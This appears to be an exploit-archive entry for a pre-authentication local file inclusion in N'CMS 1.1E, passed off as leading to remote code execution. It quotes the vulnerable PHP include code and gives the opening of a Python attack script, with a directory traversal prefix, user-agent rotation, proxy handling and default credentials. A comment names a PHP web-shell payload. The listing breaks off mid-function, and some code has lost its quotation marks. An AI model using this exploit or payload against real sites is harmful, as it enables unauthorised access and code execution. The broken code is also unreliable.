N'CMS is a PHP content management system. N'CMS 1.1E has a pre-authentication local file inclusion (LFI) vulnerability: the `page` request parameter is concatenated, unsanitised, into an include() path, which may lead to disclosure of sensitive files and, as the exploit below claims, remote code execution.
[+] Info:
~~~~~~~~~
N'CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit
[+] Poc:
~~~~~~~~~
#!/usr/bin/python
# ~INFORMATION
# Exploit Title: N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit
# Date: 11/3/2011
# Software link: http://bit.ly/eJAyw5
# Tested on: Linux bt
# Version: 1.1E
# php.ini setting required: magic_quotes_gpc = Off (the directive is magic_quotes_gpc, not gpc_magic_quotes)
# Note: the application narrowly escaped a session-injection variant using a
# malicious username such as <?php system($_GET[cmd]) ?>, because
# htmlentities() encodes the angle brackets :-)
# ~VULNERABLE CODE
<?php
// Page dispatcher as quoted in the advisory. NOTE(review): the string quotes
// were lost in this listing; the path expression is presumably
// 'page/' . $_GET['page'] . '.php'.
if( isset( $_GET[page] ) )
{
// The raw request parameter is spliced into the include path with no
// basename()/whitelist check, so "../" sequences walk out of page/.
// file_exists() only confirms that the traversed path exists; it is not a
// sanitiser and does not stop the traversal.
if( file_exists( page/.$_GET[page]..php ) )
{
// Local File Inclusion: whatever the traversed path resolves to is parsed
// and executed as PHP. The hard-coded ".php" suffix restricts this to .php
// files unless the suffix can be cut off; the magic_quotes_gpc=Off note in
// the header suggests that is what the exploit relies on (not confirmed here).
include( page/.$_GET[page]..php );
}
else
{
// Fallback for a missing page; a fixed path, not attacker-controlled.
include( page/404.php );
}
}
else
{
// No page parameter at all: serve the fixed home page.
include( page/home.php );
}
?>
import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass
from optparse import OptionParser
from urlparse import urlparse,urljoin
from urllib import urlopen
from cookielib import CookieJar
__CONTACT__ ="TecR0c(tecr0c@tecninja.net)"
__DATE__ ="11.3.2011"
usage = Example : %s http://localhost/ncms/ -c user:pass -w databases.txt
-p 127.0.0.1:8080 % __file__
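parser = OptionParser(usage=usage)
# -p: explicit HTTP proxy "host:port"; probed later by proxyCheck()/getProxy().
parser.add_option("-p", "--proxy", type="string", action="store", dest="proxy",
                  help="HTTP Proxy <server>:<port>")
# -w: wordlist of candidate database names for the brute-force stage.
parser.add_option("-w", "--wordlist", type="string", action="store",
                  dest="wordlist",
                  help="file to use to bruteforce database")
# -c: login as user:pass. NOTE(review): the default is a hard-coded account
# that only helps if such a user exists on the target; whatever is given
# here ends up in `ps` output and shell history.
parser.add_option("-c", "--credentials", type="string", action="store",
                  dest="credentials", default="hacker:ph33r",
                  help="credentials for login, "
                       "or [default: %default]")
# Parsed at import time: optparse exits the process on unknown options.
(options, args) = parser.parse_args()
if options.proxy:
    print("[+] Using Proxy " + options.proxy)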
# User Agents
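# Pool of User-Agent strings; one is picked per run so requests do not all
# carry the urllib default. random is fine here, nothing secret depends on it.
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
          "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
          "Google Chrome 0.2.149.29 (Windows XP)",
          "Opera 9.25 (Windows Vista)",
          "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
          "Opera/8.00 (Windows NT 5.1; U; en)"]
agent = random.choice(agents)
# Prefix for the vulnerable `page` parameter: eight "../" hops out of the
# page/ directory. NOTE(review): deep enough for most document roots; raise
# it if the target install is nested deeper.
traversal = "./../../../../../../../.."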
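def banner(delay=0.005):
    """Clear the terminal and print the tool banner one character at a time.

    Args:
        delay: pause in seconds between characters (typewriter effect).

    Side effects: runs `clear` (POSIX) or `cls` through the shell and writes
    to stdout. Reads the module-level __CONTACT__ and __DATE__.
    """
    # Fixed command strings only, so os.system() is acceptable here.
    os.system("clear" if os.name == "posix" else "cls")
    header = """
|----------------------------------------|
|Exploit: NCMS LFI RCE
|Author: %s
|Date: %s
|----------------------------------------|
""" % (__CONTACT__, __DATE__)
    for ch in header:
        # sys.stdout.write rather than `print ch,`: the print statement's
        # trailing comma inserts a space between every character and
        # mangles the box drawing.
        sys.stdout.write(ch)
        sys.stdout.flush()
        time.sleep(delay)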
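def proxyCheck(proxy=None, timeout=10):
    """Fail fast if the HTTP proxy given with -p does not accept connections.

    Args:
        proxy: "host:port" to probe; None means use options.proxy.
        timeout: seconds allowed for the TCP connect. The original opened the
            connection without a timeout, so its socket.timeout branch could
            never fire and a dead proxy hung the tool indefinitely.

    Does nothing when no proxy is configured. On failure prints a message and
    exits with status 1. Only socket/HTTP errors are handled, so Ctrl-C and
    programming errors propagate instead of being reported as "Proxy Failed".
    """
    if proxy is None:
        proxy = options.proxy
    if not proxy:
        return
    conn = None
    try:
        # Only the TCP handshake is checked; this says nothing about whether
        # the proxy will actually forward requests. A malformed "host:port"
        # raises httplib.InvalidURL here, an HTTPException subclass.
        conn = httplib.HTTPConnection(proxy, timeout=timeout)
        conn.connect()
        print("[+] Using Proxy Server: " + proxy)
    except socket.timeout:
        # Must precede socket.error: timeout is a subclass of it.
        print("[-] Proxy Timed Out")
        sys.exit(1)
    except (socket.error, httplib.HTTPException):
        print("[-] Proxy Failed")
        sys.exit(1)
    finally:
        # The original never closed the probe socket.
        if conn is not None:
            conn.close()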
def getProxy():
try:
proxy_handler = urllib2.ProxyHandler({http: options.proxy})
except(socket.timeout):
&nbs